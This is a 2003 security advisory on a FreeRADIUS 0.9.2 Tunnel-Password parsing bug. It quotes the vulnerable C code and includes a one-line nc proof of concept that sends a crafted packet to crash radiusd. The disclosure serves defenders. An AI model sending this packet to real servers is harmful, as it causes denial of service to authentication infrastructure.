FreeRADIUS 0.9.2 "Tunnel-Password" attribute Handling Vulnerability
S-Quadra Advisory #2003-11-21
Topic: FreeRADIUS 0.9.2 "Tunnel-Password" attribute Handling Vulnerability
Severity: Average
Release date: 21 Nov 2003
1. DESCRIPTION
The FreeRADIUS Server (http://www.freeradius.org) is a high-performance
and highly configurable GPL'd free RADIUS server.
There exists a security vulnerability in FreeRADIUS up to 0.9.2, which
may allow an attacker
to mount a Denial of Service attack or possibly execute an arbitrary
code (unproved).
2. DETAILS
Access-Request packet with a malformed Tunnel-Password attribute
triggers the invocation of memcpy()
with a negative third argument, thereby causing radiusd to crash.
Below is the snip of vulnerable code from src/lib/radius.c:
[snip]
int rad_decode(RADIUS_PACKET *packet, RADIUS_PACKET *original,
const char *secret)
{
DICT_ATTR *attr;
uint32_t lvalue;
uint32_t vendorcode;
VALUE_PAIR **tail;
VALUE_PAIR *pair;
uint8_t *ptr;
int length;
int attribute;
int attrlen;
int vendorlen;
radius_packet_t *hdr;
...
while(length > 0) {
if (vendorlen > 0) {
attribute = *ptr++ | (vendorcode << 16);
attrlen = *ptr++;
} else {
attribute = *ptr++;
attrlen = *ptr++;
}
/* Evgeny Legerov (EL): Suppose attrlen == 2 */
attrlen -= 2;
length -= 2;
...
if ((pair = malloc(sizeof(VALUE_PAIR))) == NULL) {
pairfree(&packet->vps);
librad_log("out of memory");
errno = ENOMEM;
return -1;
}
memset(pair, 0, sizeof(VALUE_PAIR));
...
/* EL: Now we have pair->length == 0 */
pair->attribute = attribute;
pair->length = attrlen;
pair->operator = T_OP_EQ;
pair->next = NULL;
switch (pair->type) {
case PW_TYPE_OCTETS:
case PW_TYPE_ABINARY:
case PW_TYPE_STRING:
if (pair->flags.has_tag &&
pair->type == PW_TYPE_STRING) {
int offset = 0;
if(TAG_VALID(*ptr)) {
pair->flags.tag = *ptr;
pair->length--;
offset = 1;
} else if (pair->flags.encrypt ==
FLAG_ENCRYPT_TUNNEL_PASSWORD) {
/*
* from RFC2868 - 3.5.
Tunnel-Password
* If the value of the Tag field
is greater than
* 0x00 and less than or equal
to 0x1F, it SHOULD
* be interpreted as indicating
which tunnel
* (of several alternatives)
this attribute pertains;
* otherwise, the Tag field
SHOULD be ignored.
*/
pair->flags.tag = 0x00;
/* EL: at this point we have pair->length == -1 */
pair->length--;
offset = 1;
} else {
pair->flags.tag = 0x00;
}
memcpy(pair->strvalue, ptr + offset,
pair->length);
}
[snip]
To exploit this vulnerability attacker does not need to know NAS
(Network Access Server) secret as the NAS's IP address can be easily
spoofed.
The code execution was unproved, but still remains possible.
3. FIX INFORMATION
S-Quadra alerted FreeRADIUS team to this issue on 20th November 2003,
fix was available in CVS after several hours.
Unfortunately, the first attempt to contact with FreeRADIUS development
team was made through
post to freeradius-users mailing list, as page
http://www.freeradius.org/usage.html#help
("reporting bugs" section) will lead directly to the subscription form
for this list.
We actually admit that such behaviour is NOT correct and our futher
FreeRADIUS security reports will be issued directly to freeradius-devel
mailing list.
Also, apparently, despite the post to freeradius-user list of the person
claiming to be "Chris Parker <cparker@xxxxxxxxxxxxxx>",
we have some knowledge of "how radius works" and PoC included in this
advisory.
4. PoC CODE
The following command will crash the radiusd daemon:
bash-2.05$ echo -ne
"\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02"
| nc -vu -w1 <victim> <port>
4. CREDITS
Evgeny Legerov <e.legerov@xxxxxxxxxxxx> is responsible for discovering
this issue.
5. ABOUT
S-Quadra offers services in computer security, penetration testing and
network assesment,
web application security, source code review and third party product
vulnerability assesment,
forensic support and reverse engineering.
Security is an art and our goal is to bring responsible and high quality
security
service to the IT market, customized to meet the unique needs of each
individual client.
S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.
S-Quadra Advisory #2003-11-21